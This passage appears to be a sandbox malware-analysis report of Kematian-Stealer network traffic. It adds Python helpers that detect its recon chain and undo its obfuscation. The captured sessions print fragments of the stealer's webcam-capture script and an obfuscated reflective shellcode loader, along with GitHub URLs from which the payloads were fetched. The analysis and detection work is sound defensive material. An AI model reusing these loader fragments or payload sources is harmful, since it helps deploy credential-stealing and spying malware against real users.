6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74
Data Ascii: 116fl=650f186h=www.cloudflare.comip=8.46.123.33ts=1720022910.568visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgat
2024-07-03 16:08:30 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
2  192.168.2.7  49716  104.16.123.96  443  7696  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-07-03 16:08:31 UTC  152  OUT  GET /cdn-cgi/trace HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.cloudflare.com
2024-07-03 16:08:31 UTC  332  IN  HTTP/1.1 200 OK
Date: Wed, 03 Jul 2024 16:08:31 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
Access-Control-Allow-Origin: *
Server: cloudflare
CF-RAY: 89d8227b0d2842b9-EWR
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
2024-07-03 16:08:31 UTC  290  IN  Data Raw: 31 31 62 0d 0a 66 6c 3d 36 35 30 66 31 37 30 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 30 32 32 39 31 31 2e 32 30 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 30 31 30 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66
Data Ascii: 11bfl=650f170h=www.cloudflare.comip=8.46.123.33ts=1720022911.207visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=010-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=of
2024-07-03 16:08:31 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
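Taken together, the sessions above form a recognisable recon chain from a single PowerShell process: a script fetched from raw.githubusercontent.com, two www.cloudflare.com /cdn-cgi/trace calls to learn the public IP, then ip-api.com /line/?fields=hosting followed by ip-api.com /json, all carrying the WindowsPowerShell/5.1.19041.1682 User-Agent. The following is an added detection example, not Joe Sandbox or Kematian-Stealer code: it parses a constructed proxy-style log whose entries are taken from the requests recorded on this page (plus one benign line for contrast) and flags any client that trips three or more of the indicator rules. The log format, the rule names and the threshold are assumptions for illustration.

```python
"""Flag the PowerShell recon chain (GitHub .ps1 fetch, cdn-cgi/trace,
ip-api.com hosting and geo lookups) in a proxy-style log.

Added example, not Joe Sandbox or Kematian-Stealer code.  The log lines are
constructed from the requests on this page; the format, rule names and
threshold are assumptions.
"""
import re
from collections import defaultdict

# Constructed log, one request per line:
#   <timestamp> <client> <method> <host> <path> "<user-agent>"
SAMPLE_LOG = """\
2024-07-03T16:08:27Z 192.168.2.7 GET raw.githubusercontent.com /ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1 "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
2024-07-03T16:08:30Z 192.168.2.7 GET www.cloudflare.com /cdn-cgi/trace "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
2024-07-03T16:08:31Z 192.168.2.7 GET ip-api.com /line/?fields=hosting "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
2024-07-03T16:08:31Z 192.168.2.7 GET ip-api.com /json "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
2024-07-03T16:08:38Z 192.168.2.7 GET github.com /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 "-"
2024-07-03T16:09:00Z 192.168.2.9 GET www.cloudflare.com /cdn-cgi/trace "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$'
)

# Indicator rules: (name, predicate over one parsed request).  Names are
# assumptions; each rule mirrors one request seen in the sessions above.
RULES = [
    ("powershell_ua", lambda r: "WindowsPowerShell/" in r["ua"]),
    ("hosting_check", lambda r: r["host"] == "ip-api.com" and "fields=hosting" in r["path"]),
    ("geo_lookup", lambda r: r["host"] == "ip-api.com" and r["path"].startswith("/json")),
    ("cf_trace", lambda r: r["host"] == "www.cloudflare.com" and r["path"] == "/cdn-cgi/trace"),
    ("github_ps1", lambda r: r["host"] in ("raw.githubusercontent.com", "github.com")
                              and r["path"].lower().endswith(".ps1")),
]


def parse_log(text: str) -> list:
    """Parse the constructed log format into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def score_clients(records, threshold: int = 3) -> dict:
    """Map each client to the sorted set of rules it tripped, keeping only
    clients at or above the threshold.  Any single rule (a Cloudflare trace
    from a browser, say) is too common to alert on by itself; the chain is
    what matters."""
    hits = defaultdict(set)
    for r in records:
        for name, pred in RULES:
            if pred(r):
                hits[r["client"]].add(name)
    return {c: sorted(n) for c, n in hits.items() if len(n) >= threshold}


if __name__ == "__main__":
    for client, names in score_clients(parse_log(SAMPLE_LOG)).items():
        print(client, "->", ", ".join(names))
```

In this run the /line/?fields=hosting lookup answered `false` (the six-byte body above), and the script carries that value into its collected system-info text as "VPN/Proxy: $hosting" (see the main.ps1 fragment in the raw.githubusercontent.com session); the /json answer supplies the country, ISP and public IP fields next to it. Because the requests go to legitimate public services, the User-Agent plus the sequence is the signal, not any one destination.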


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.749720140.82.121.34431920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:38 UTC121OUTGET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1
                                      Host: github.com
                                      Connection: Keep-Alive
                                       2024-07-03 16:08:38 UTC | 572 | IN | HTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Access-Control-Allow-Origin:
                                      Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                       2024-07-03 16:08:38 UTC | 3028 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       4 | 192.168.2.7 | 49721 | 185.199.109.133 | 443 | 1920 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-07-03 16:08:39 UTC | 132 | OUT | GET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1
                                      Host: raw.githubusercontent.com
                                      Connection: Keep-Alive
                                       2024-07-03 16:08:39 UTC | 898 | IN | HTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 6453
                                      Cache-Control: max-age=300
                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      Content-Type: text/plain; charset=utf-8
                                      ETag: "b50d2c1034106e88552448ec70d0c1c0b89ade259fb54cca4421fb16c45cbe01"
                                      Strict-Transport-Security: max-age=31536000
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: deny
                                      X-XSS-Protection: 1; mode=block
                                      X-GitHub-Request-Id: 30B3:33A73:425B2:49948:66857786
                                      Accept-Ranges: bytes
                                      Date: Wed, 03 Jul 2024 16:08:39 GMT
                                      Via: 1.1 varnish
                                      X-Served-By: cache-nyc-kteb1890070-NYC
                                      X-Cache: MISS
                                      X-Cache-Hits: 0
                                      X-Timer: S1720022919.209736,VS0,VE464
                                      Vary: Authorization,Accept-Encoding,Origin
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      X-Fastly-Request-ID: 1ba617735a217fbc96077f303bc230ee43f82a92
                                      Expires: Wed, 03 Jul 2024 16:13:39 GMT
                                      Source-Age: 0
                                       2024-07-03 16:08:39 UTC | 1378 | IN | Data Raw: 66 75 6e 63 74 69 6f 6e 20 47 65 74 2d 57 65 62 43 61 6d 49 6d 61 67 65 20 7b 0a 20 20 20 20 23 20 6d 61 64 65 20 62 79 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 65 66 61 6e 73 74 72 61 6e 67 65 72 2f 50 6f 77 65 72 53 68 65 6c 6c 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 47 65 74 2d 57 65 62 43 61 6d 70 2e 70 73 31 0a 20 20 20 20 24 73 6f 75 72 63 65 20 3d 20 40 22 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 3b 20 0a 20 20 20 20 75 73 69 6e 67 20
                                       Data Ascii: function Get-WebCamImage {\n    # made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1\n    $source = @" \n    using System; \n    using System.Collections.Generic; \n    using System.Text; \n    using System.Collections; \n    using 
                                       2024-07-03 16:08:39 UTC | 1378 | IN | Data Raw: 50 6f 69 6e 74 20 3d 20 22 53 65 6e 64 4d 65 73 73 61 67 65 41 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 6e 64 4d 65 73 73 61 67 65 28 69 6e 74 20 68 77 6e 64 2c 20 69 6e 74 20 77 4d 73 67 2c 20 69 6e 74 20 77 50 61 72 61 6d 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 41 73 41 6e 79 29 5d 20 6f 62 6a 65 63 74 20 6c 50 61 72 61 6d 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 75 73 65 72 33 32 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 74 57 69 6e 64 6f 77 50 6f 73 28 69 6e
                                       Data Ascii: Point = "SendMessageA")] \n            protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam); \n    \n            [DllImport("user32")] \n            protected static extern int SetWindowPos(in
                                       2024-07-03 16:08:39 UTC | 1378 | IN | Data Raw: 4c 44 2c 20 30 2c 20 30 2c 20 77 69 6e 64 6f 77 57 69 64 74 68 2c 20 77 69 6e 64 6f 77 48 65 69 67 68 74 2c 20 68 61 6e 64 6c 65 2c 20 30 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 44 52 49 56 45 52 5f 43 4f 4e 4e 45 43 54 2c 20 74 68 69 73 2e 69 6e 64 65 78 2c 20 30 29 20 3e 20 30 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 53 45 54 5f 53 43 41 4c 45 2c 20 2d 31 2c 20 30 29 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                       Data Ascii: LD, 0, 0, windowWidth, windowHeight, handle, 0); \n    \n                if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0) \n                { \n                    SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0); \n                  
                                       2024-07-03 16:08:39 UTC | 1378 | IN | Data Raw: 20 6c 70 73 7a 4e 61 6d 65 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 20 63 62 4e 61 6d 65 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 56 42 42 79 52 65 66 53 74 72 29 5d 20 72 65 66 20 53 74 72 69 6e 67 20 6c 70 73 7a 56 65 72 2c 20 69 6e 74 20 63 62 56 65 72 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 61 74 69 63 20 41 72 72 61 79 4c 69 73 74 20 64 65 76 69 63 65 73 20 3d 20 6e 65 77 20 41 72 72 61 79 4c 69 73 74 28 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 44 65 76 69 63 65 5b 5d 20 47 65 74 41 6c 6c 44 65 76 69 63 65 73 28 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                       Data Ascii:  lpszName, \n            int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer); \n    \n            static ArrayList devices = new ArrayList(); \n    \n            public static Device[] GetAllDevices() \n            { \n              
                                       2024-07-03 16:08:39 UTC | 941 | IN | Data Raw: 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 5b 72 65 66 6c 65 63 74 69 6f 6e 2e 61 73 73 65 6d 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 24 70 69 63 43 61 70 74 75 72 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 2e 50 69 63 74 75 72 65 42 6f 78 20 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 64 65 76 69 63 65 73 20 3d 20 5b 57 65 62 43 61 6d 4c 69
                                       Data Ascii: bly]::loadwithpartialname("System.Windows.Forms") | Out-Null \n        [reflection.assembly]::loadwithpartialname("System.Drawing") | Out-Null \n        $picCapture = New-Object System.Windows.Forms.PictureBox \n        try {\n            $devices = [WebCamLi


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       5 | 192.168.2.7 | 49722 | 140.82.121.3 | 443 | 1888 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-07-03 16:08:50 UTC | 133 | OUT | GET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                      Host: github.com
                                      Connection: Keep-Alive
                                       2024-07-03 16:08:50 UTC | 584 | IN | HTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:50 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Access-Control-Allow-Origin:
                                      Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                       2024-07-03 16:08:50 UTC | 3025 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       6 | 192.168.2.7 | 49723 | 185.199.109.133 | 443 | 1888 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-07-03 16:08:51 UTC | 144 | OUT | GET /Somali-Devs/Kematian-Stealer/main/frontend-src/kematian_shellcode.ps1 HTTP/1.1
                                      Host: raw.githubusercontent.com
                                      Connection: Keep-Alive
                                       2024-07-03 16:08:51 UTC | 898 | IN | HTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 2974
                                      Cache-Control: max-age=300
                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      Content-Type: text/plain; charset=utf-8
                                      ETag: "fe3aacdc6907ec951179c5b0e10c992291900e024a0164ca4a7fbbedb7ebcc17"
                                      Strict-Transport-Security: max-age=31536000
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: deny
                                      X-XSS-Protection: 1; mode=block
                                      X-GitHub-Request-Id: 4FF3:188D73:73D0D:7B988:6685778D
                                      Accept-Ranges: bytes
                                      Date: Wed, 03 Jul 2024 16:08:51 GMT
                                      Via: 1.1 varnish
                                      X-Served-By: cache-nyc-kteb1890054-NYC
                                      X-Cache: MISS
                                      X-Cache-Hits: 0
                                      X-Timer: S1720022931.398343,VS0,VE89
                                      Vary: Authorization,Accept-Encoding,Origin
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      X-Fastly-Request-ID: 9f5501537cceb63378e520ba5d1b74d5ca9fe05b
                                      Expires: Wed, 03 Jul 2024 16:13:51 GMT
                                      Source-Age: 0
                                       2024-07-03 16:08:51 UTC | 1378 | IN | Data Raw: 24 50 72 6f 67 72 65 73 73 50 72 65 66 65 72 65 6e 63 65 20 3d 20 27 53 69 6c 65 6e 74 6c 79 43 6f 6e 74 69 6e 75 65 27 0d 0a 66 75 6e 63 74 69 6f 6e 20 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 7b 0d 0a 20 20 20 20 50 61 72 61 6d 20 28 24 6b 65 6d 61 74 69 61 6e 5f 6d 6f 64 75 6c 65 73 2c 20 24 6b 65 6d 61 74 69 61 6e 5f 66 75 6e 63 29 0d 0a 20 20 20 20 24 61 73 73 65 6d 20 3d 20 28 5b 41 70 70 44 6f 6d 61 69 6e 5d 3a 3a 22 63 55 72 52 45 4e 74 64 4f 4d 41 69 6e 22 2e 28 27 47 27 20 2b 20 27 65 27 20 2b 20 27 74 41 27 20 2b 20 27 73 73 65 6d 62 6c 69 65 73 27 29 2e 49 6e 76 6f 6b 65 28 29 20 7c 20 3f 20 7b 20 24 5f 2e 22 47 4c 6f 42 41 4c 41 73 53 65 4d 42 6c 59 63 41 63 68 65 22 20 2d 41 6e 64 20 24 5f 2e 22 6c 4f 43 61 54 69 6f 4e 22 2e 28 27 53 70
                                       Data Ascii: $ProgressPreference = 'SilentlyContinue'\r\nfunction KematianLoader {\r\n    Param ($kematian_modules, $kematian_func)\r\n    $assem = ([AppDomain]::"cUrRENtdOMAin".('G' + 'e' + 'tA' + 'ssemblies').Invoke() | ? { $_."GLoBALAsSeMBlYcAche" -And $_."lOCaTioN".('Sp
                                       2024-07-03 16:08:51 UTC | 1378 | IN | Data Raw: 64 65 42 79 53 69 67 2c 20 50 75 62 6c 69 63 27 2c 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 73 5d 3a 3a 22 73 74 61 6e 64 41 52 44 22 2c 20 24 66 75 6e 63 29 2e 28 27 53 65 74 49 6d 70 6c 65 27 20 2b 20 27 6d 65 6e 74 27 20 2b 20 27 61 74 69 6f 27 20 2b 20 27 6e 27 20 2b 20 27 46 6c 61 67 27 20 2b 20 27 73 27 29 2e 49 6e 76 6f 6b 65 28 27 52 75 6e 74 69 6d 65 2c 20 4d 61 6e 61 67 65 64 27 29 0d 0a 20 20 20 20 24 74 79 70 65 2e 28 27 44 65 66 69 27 20 2b 20 27 6e 27 20 2b 20 27 65 4d 65 74 68 6f 64 27 29 2e 49 6e 76 6f 6b 65 28 27 49 6e 76 6f 6b 65 27 2c 20 27 50 75 62 6c 69 63 2c 20 48 69 64 65 42 79 53 69 67 2c 20 4e 65 77 53 6c 6f 74 2c 20 56 69 72 74 75 61 6c 27 2c 20 24 64 65 6c 54
                                       Data Ascii: deBySig, Public', [System.Reflection.CallingConventions]::"standARD", $func).('SetImple' + 'ment' + 'atio' + 'n' + 'Flag' + 's').Invoke('Runtime, Managed')\r\n    $type.('Defi' + 'n' + 'eMethod').Invoke('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delT
                                       2024-07-03 16:08:51 UTC | 218 | IN | Data Raw: 65 72 76 69 63 65 73 2e 4d 61 72 73 68 61 6c 5d 3a 3a 28 27 47 27 20 2b 20 27 65 74 44 27 20 2b 20 27 65 6c 65 27 20 2b 20 27 67 61 74 65 46 27 20 2b 20 27 6f 72 46 75 6e 63 74 69 6f 6e 50 27 20 2b 20 27 6f 69 6e 74 65 72 27 29 2e 49 6e 76 6f 6b 65 28 28 4b 65 6d 61 74 69 61 6e 4c 6f 61 64 65 72 20 20 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 20 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 29 2c 20 28 6b 65 6d 61 74 69 61 6e 5f 64 65 6c 65 67 61 74 65 73 20 40 28 5b 49 6e 74 50 74 72 5d 2c 20 5b 49 6e 74 33 32 5d 29 28 5b 49 6e 74 5d 29 29 29 2e 22 69 4e 56 4f 6b 45 22 28 24 68 54 68 72 65 61 64 2c 20 30 78 46 46 46 46 46 46 46 46 29 0d 0a
                                       Data Ascii: ervices.Marshal]::('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer').Invoke((KematianLoader kernel32.dll WaitForSingleObject), (kematian_delegates @([IntPtr], [Int32])([Int])))."iNVOkE"($hThread, 0xFFFFFFFF)\r\n
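The kematian_shellcode.ps1 chunks captured in session 6 show two cheap obfuscations that defeat plain string matching: .NET member names are assembled from concatenated literals at run time (('G' + 'e' + 'tA' + 'ssemblies'), ('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer')) and other members are quoted with random casing ("cUrRENtdOMAin", "iNVOkE"), which PowerShell resolves case-insensitively. Once undone, the fragments read as the usual reflection route to a Win32 export: enumerate loaded assemblies from AppDomain.CurrentDomain, emit a delegate type with DefineMethod and SetImplementationFlags, and turn a function pointer into a callable with Marshal.GetDelegateForFunctionPointer, here for kernel32.dll WaitForSingleObject with an INFINITE timeout after the injected thread is started. The Python below is an added triage helper, not code from the report or from the Kematian project. It reverses both tricks on a sample hand-assembled from the three captured chunks (each cut where the capture is cut) and lists the reflection members and DLL exports the loader resolves; the canonical-name table and the reflection-member list are this example's own assumptions.

```python
import re

# Added example (not part of the report or of the Kematian project).
# SAMPLE is hand-assembled from the three kematian_shellcode.ps1 chunks captured
# in session 6; each chunk is cut where the capture is cut.
SAMPLE = r"""$ProgressPreference = 'SilentlyContinue'
function KematianLoader {
    Param ($kematian_modules, $kematian_func)
    $assem = ([AppDomain]::"cUrRENtdOMAin".('G' + 'e' + 'tA' + 'ssemblies').Invoke() | ? { $_."GLoBALAsSeMBlYcAche" -And $_."lOCaTioN".('Sp
deBySig, Public', [System.Reflection.CallingConventions]::"standARD", $func).('SetImple' + 'ment' + 'atio' + 'n' + 'Flag' + 's').Invoke('Runtime, Managed')
    $type.('Defi' + 'n' + 'eMethod').Invoke('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delT
ervices.Marshal]::('G' + 'etD' + 'ele' + 'gateF' + 'orFunctionP' + 'ointer').Invoke((KematianLoader kernel32.dll WaitForSingleObject), (kematian_delegates @([IntPtr], [Int32])([Int])))."iNVOkE"($hThread, 0xFFFFFFFF)
"""

# Trick 1: member name built from concatenated literals, e.g. .('Get' + 'Type')
CONCAT_MEMBER = re.compile(r"(\.|::)\(\s*((?:'[^'\n]*'\s*\+\s*)*'[^'\n]*')\s*\)")
# Trick 2: member name quoted with random casing, e.g. ."iNVOkE"
QUOTED_MEMBER = re.compile(r'(\.|::)"([A-Za-z_]\w*)"')

# Assumption: a small table of canonical casings for the quoted names seen here;
# anything not listed keeps the attacker's casing.
CANONICAL = {n.lower(): n for n in
             ("CurrentDomain", "GlobalAssemblyCache", "Location", "Standard", "Invoke")}

# Assumption: members that together implement Win32 API resolution through
# System.Reflection (the sequence PowerSploit-style Get-ProcAddress/Get-DelegateType use).
REFLECTION_API = {"GetAssemblies", "GetType", "GetMethod", "GetProcAddress", "GetModuleHandle",
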